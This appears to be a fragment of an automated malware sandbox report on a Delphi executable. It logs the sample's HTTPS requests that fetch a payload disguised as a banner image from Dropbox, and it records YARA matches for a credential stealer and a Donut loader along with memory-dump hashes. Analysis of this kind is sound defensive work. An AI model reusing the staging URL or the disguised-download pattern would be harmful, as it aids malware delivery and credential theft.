                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EyjQvx%2BKu6820%2FCqVtC%2FTzYXCu6cybABg1ebKjLE7oEzSkyzbIMhEEFM6diwyHjQu1ZDuCfgKgR6k5cBKTmq1Z1FzCuYzfi%2BXcIUZ5e5vedCBNLnOymfkuytZRSfqdDiZs5EJzlT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c10b88b2dc32c-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1516&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=983&delivery_rate=1926121&cwnd=171&unsent_bytes=0&cid=e747ebb19eb1f280&ts=479&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:43 UTC242INData Raw: 66 38 0d 0a 43 78 79 53 48 68 4f 49 47 34 66 38 49 63 39 51 52 2b 52 35 61 56 66 64 33 55 6b 67 7a 6c 67 56 2f 51 6c 35 67 6a 32 54 6c 53 39 51 5a 37 42 72 4d 62 49 35 37 34 68 56 76 79 4e 39 75 46 59 31 65 4b 71 71 50 67 36 71 4b 6e 71 4e 61 78 62 36 45 2f 44 36 51 6c 63 7a 34 58 31 2f 31 44 54 68 6c 58 33 67 4a 44 32 54 54 56 39 6d 72 4c 74 39 46 4b 41 35 65 49 70 6d 43 66 42 4a 34 76 77 65 56 7a 50 78 64 6e 4c 6d 64 65 4b 51 55 76 74 69 63 37 73 62 43 44 6d 7a 75 44 73 4f 70 43 68 79 77 6e 73 56 36 56 6a 71 71 45 68 73 61 2b 41 6e 4a 76 74 33 37 38 55 54 71 57 4a 7a 6a 68 63 50 50 62 53 76 49 31 6d 30 49 57 62 62 65 67 32 2f 42 65 66 73 56 6e 45 70 2f 53 6b 31 37 48 65 36 7a 51 50 6a 63 69 47 51 57 31 4e 6e 38 66
                                                                                                                                                                                                                                                  Data Ascii: f8CxySHhOIG4f8Ic9QR+R5aVfd3UkgzlgV/Ql5gj2TlS9QZ7BrMbI574hVvyN9uFY1eKqqPg6qKnqNaxb6E/D6Qlcz4X1/1DThlX3gJD2TTV9mrLt9FKA5eIpmCfBJ4vweVzPxdnLmdeKQUvtic7sbCDmzuDsOpChywnsV6VjqqEhsa+AnJvt378UTqWJzjhcPPbSvI1m0IWbbeg2/BefsVnEp/Sk17He6zQPjciGQW1Nn8f
                                                                                                                                                                                                                                                  2025-01-14 07:55:43 UTC12INData Raw: 38 73 41 76 52 6f 61 4b 41 3d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 8sAvRoaKA=
                                                                                                                                                                                                                                                  2025-01-14 07:55:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.749883162.125.66.184437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:43 UTC290OUTGET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:44 UTC4261INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                  Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-do [TRUNCATED]
                                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'nonce-ovuBZL7C34mYkcNGttZRSDeZOHA=' 'nonce-hKRMqZXwgAkcvLebe1PkZuUBShI=' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Location: https://ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com/cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2Gq-GsZR54eh5vxAS-adfp4y9q3FJLldfmw9w0FyJuGGMus-FkcNVlxAuTQ8Ra9WJRYaA9VqEUMfCd5FVo2eMnYMFHqbIaiWnVg_3Z1OdxGxQ9KtAX_qhrQxKC2DD/file?dl=1#
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                  Set-Cookie: gvc=MTI5MDA1NzQ4NjAzNjE4NTg2NzgzOTIwMzA4NTg1NDg4NTkzNTAw; Path=/; Expires=Sun, 13 Jan 2030 07:55:44 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: t=6tu5NNw7CbWRojFUkd5EdaFy; Path=/; Domain=dropbox.com; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=6tu5NNw7CbWRojFUkd5EdaFy; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=EAL7MZxH9M; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 13 Jan 2030 07:55:44 GMT
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:44 GMT
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 1698a6e458b549fdbeef170b1a4c91a3
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2025-01-14 07:55:44 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.749897162.125.66.154437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:45 UTC401OUTGET /cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2Gq-GsZR54eh5vxAS-adfp4y9q3FJLldfmw9w0FyJuGGMus-FkcNVlxAuTQ8Ra9WJRYaA9VqEUMfCd5FVo2eMnYMFHqbIaiWnVg_3Z1OdxGxQ9KtAX_qhrQxKC2DD/file?dl=1# HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:46 UTC203INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                  Content-Length: 1005
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: local
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:45 GMT
                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2025-01-14 07:55:46 UTC1005INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 400</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:02:55:17
                                                                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\yTRd6nkLWV.exe"
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:1'625'936 bytes
                                                                                                                                                                                                                                                  MD5 hash:D71663E0A0164A482C1FFC9D2C06539F
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1473028075.0000000000706000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Reset < >
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000003.1528399384.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false
                                                                                                                                                                                                                                                    • Associated: 00000001.00000003.1499124135.00000000006DE000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_3_6b9000_yTRd6nkLWV.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $,5$e$f$i
                                                                                                                                                                                                                                                    • API String ID: 0-116732497
                                                                                                                                                                                                                                                    • Opcode ID: 480eca68445897ebb81ec1c6b1f04a7454999ac49a1e8948c4d45ec6081c98a7
                                                                                                                                                                                                                                                    • Instruction ID: 83364154e7f78dacc6e377b338e27e614099f9692a66cfce0d5e1496dcb29d55
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 480eca68445897ebb81ec1c6b1f04a7454999ac49a1e8948c4d45ec6081c98a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D1439281E3D04FE7138B34996AB953FB1AF63218F0E45DBD1D08F1E3D668191AC322
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, Offset: 0339F000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_3_339f000_yTRd6nkLWV.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3aa0a41c89582f77f6411da687549ab5f7cf394d3ae3cf3503018ab3c913520c
                                                                                                                                                                                                                                                    • Instruction ID: 34ce328e3bbe5b8c57371b77cdc53f3f46a8a16167d6dd643e447f6424499370
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3aa0a41c89582f77f6411da687549ab5f7cf394d3ae3cf3503018ab3c913520c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C852C85544E7C14FDB178B349DB96A07FB0AE13228B4E85DBC4C0CF0B3E259995AD362